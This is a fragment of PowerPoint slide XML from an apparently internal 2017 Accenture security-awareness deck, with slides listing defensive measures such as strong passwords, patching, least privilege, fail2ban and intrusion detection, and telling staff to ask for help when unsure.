        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960096" y="4005064"/>
            <a:ext cx="5544616" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp; Diversity</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://goo.gl/lzVsW7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2540155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srcRect l="4961" r="4961"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-14288"/>
            <a:ext cx="12192000" cy="6886575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191344" y="332656"/>
            <a:ext cx="7927848" cy="4991100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0"/>
              <a:t>Reduce</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0"/>
              <a:t>risk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Being </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5015880" y="1268760"/>
            <a:ext cx="7056784" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>Strong passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>Nothing online (VPN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>DMZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>WHITELIST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>PATCHING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>HARDENING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>FAIL2BAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>INTRUSION DETECTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0"/>
              <a:t>REVIEW BEFORE REUSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222984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edia.licdn.com/mpr/mpr/AAEAAQAAAAAAAAd5AAAAJGFlZDRjYzRhLThjZmQtNDQxZC1hNWRjLTRhZjUxZmMwOTI3Mw.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2102" y="0"/>
            <a:ext cx="12169898" cy="69741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sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1052736"/>
            <a:ext cx="11430001" cy="5466273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="398461" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple levels of defence around  what you care about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network segregation (private subnet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalls (security groups)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398461" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Principle of least privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t run as root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limited privileged roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398461" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Datensparsamkeit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628644" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If data doesn’t need to be somewhere make sure it isn’t there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No shared accounts, passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFEA00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> keys (ever)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFEA00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="380999"/>
            <a:ext cx="11691664" cy="671737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce the impact of being hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353903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7000">
              <a:schemeClr val="accent4"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent3"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000"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bwMode="grayWhite">
          <a:xfrm>
            <a:off x="0" y="495302"/>
            <a:ext cx="12192000" cy="6172199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>That</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Someone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is trying </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To hack you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98838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flipH="1">
            <a:off x="6763482" y="1196752"/>
            <a:ext cx="5428517" cy="5695492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>doubt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583832" y="3429000"/>
            <a:ext cx="2376264" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>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Your lead</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Country lead</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Markos</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Project team</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ASOC</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kumimoji="0" lang="en-US" sz="36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5022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rgbClr val="710012"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000" scaled="0"/>
        </a:gra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bwMode="grayWhite"/>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHAT’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="466008"/>
            <a:ext cx="6299769" cy="917474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read this</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.accenture.com/martin_croker/2017/03/25/tales-from-the-front-line-cloud-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536160" y="1819812"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="4572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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>THIS WEEK</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Strong passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="0000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nothing</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> online</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="0000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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Real-time alerts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7896200" y="3993038"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="4572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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Coming</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> soon:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" baseline="0" dirty="0">
                <a:solidFill>
